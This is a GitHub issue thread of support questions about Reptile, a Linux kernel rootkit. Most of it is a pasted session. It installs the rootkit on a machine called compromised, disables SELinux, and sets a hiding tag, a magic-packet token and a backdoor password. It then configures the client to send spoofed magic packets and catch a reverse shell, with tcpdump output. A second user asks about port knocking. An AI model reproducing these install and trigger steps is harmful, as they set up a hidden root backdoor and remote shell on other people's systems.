Closed PracaGrande closed 4 years ago
hey bro,
How are you installing Reptile (what is the whole list of configuration?). What system are you installing it? Is this system in the same network from yours, or is it behind from a firewall?
I need more information to help you use it, or to discover if this is a Bug.
So, I got a bug list of Reptile, and I am intended to publish some updates soon.
thx,
403
Hi,
On the compromised machine, running Linux 2.6.32-754.22.1.el6.x86_64, I did:
# git clone https://github.com/f0rb1dd3n/Reptile.git
Initialized empty Git repository in /tmp/Reptile/.git/
remote: Enumerating objects: 793, done.
remote: Total 793 (delta 0), reused 0 (delta 0), pack-reused 793
Receiving objects: 100% (793/793), 243.44 KiB | 398 KiB/s, done.
Resolving deltas: 100% (434/434), done.
# cd Reptile/
# ./setup.sh install
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... enforcing
Trying to set enforce permissive... DONE!
Trying to disable SELinux... DONE!
Maybe you will need to reboot!
Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666): 50001
Would you like to config reverse shell each X time? (y/n) (default: n): n
Token: hax0r
Backdoor password: s3cr3t
SRC port: 50001
TAGs to hide file contents:
#<reptile>
content to be hidden
#</reptile>
Configuring... DONE!
Compiling... DONE!
Copying files to /reptile... DONE!
Installing... DONE!
Would you like to remove this directory (/tmp/Reptile/) on exit? (Y/N) [default: N]: n
Not removing /tmp/Reptile/
Instalation has finished!
After reboot, reptile_cmd seems to be working well.
$ /reptile/reptile_cmd show
Success!
$ ls -lisa /reptile/
total 652
1569794 4 drwxr-xr-x. 2 root root 4096 Sep 20 17:35 .
2 4 dr-xr-xr-x. 26 root root 4096 Sep 20 17:39 ..
1569797 8 -rwxrwxrwx. 1 root root 7048 Sep 20 17:35 reptile_cmd
1569795 572 -rwxrwxrwx. 1 root root 585543 Sep 20 17:35 reptile.ko
1569799 4 -rwxrwxrwx. 1 root root 2488 Sep 20 17:35 reptile_rc
1569796 56 -rwxrwxrwx. 1 root root 56224 Sep 20 17:35 reptile_reverse
1569798 4 -rwxrwxrwx. 1 root root 156 Sep 20 17:35 reptile_start
$ ls -lisa /sys/module/ | grep reptile
12653 0 drwxr-xr-x 5 root root 0 Sep 20 17:50 reptile
$ lsmod | grep reptile
reptile 13536 0
On the client side. Same network segment. Linux 3.10.0-1062.el7.x86_64
$ ./setup.sh client
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
Configuring... DONE!
Compiling... DONE!
Your client is at bin/
An then:
reptile-client> show
VAR VALUE DESCRIPTION
LHOST 192.168.118.157 Local host to receive the shell
LPORT 80 Local port to receive the shell
SRCHOST 192.168.118.157 Source host on magic packets (spoof)
SRCPORT 50001 Source port on magic packets (only for TCP/UDP)
RHOST 192.168.118.156 Remote host
RPORT 80 Remote port (only for TCP/UDP)
PROT TCP Protocol to send magic packet (ICMP/TCP/UDP)
PASS s3cr3t Backdoor password (optional)
TOKEN hax0r Token to trigger the shell
reptile-client> run
[*] Using password: s3cr3t
[*] Listening on port 80...
[*] TCP: 64 bytes was sent!
On the compromised system, running tcpdump I can see that the client sends TCP packet with the correct source port. It seems it correctly triggers the compromised system to send a packet back to port 80 but is being refused.
17:55:25.600050 IP 192.168.118.157.50001 > 192.168.118.156.80: Flags [S], seq 1886257152:1886257176, win 8192, length 24
17:55:25.708139 IP 192.168.118.156.40622 > 192.168.118.157.80: Flags [S], seq 3216287733, win 14600, options [mss 1460,sackOK,TS val 688118 ecr 0,nop,wscale 7], length 0
17:55:25.708536 IP 192.168.118.157 > 192.168.118.156: ICMP host 192.168.118.157 unreachable - admin prohibited, length 68
Is there any additional listener or settings that I need to do on the client side?
Thank you
Nevermind, on the client system I was running iptables. Its working correctly.
Hi, nice work on putting this code together!
I'm trying to use the Port Knocking feature but still couldn't make it work. On the backdoor I used the following settings:
Token: hax0r Backdoor password: s3cr3t SRC port: 50001
After configuring the client I send the magic packet to the compromised system but don't get a connection back. Using tcpdump I can see the magic packet arriving at the compromised system. Tried connecting to an open and closed port on both TCP and UDP but no luck. Does reptile backdoor listens for the magic packet on any port?
Thanks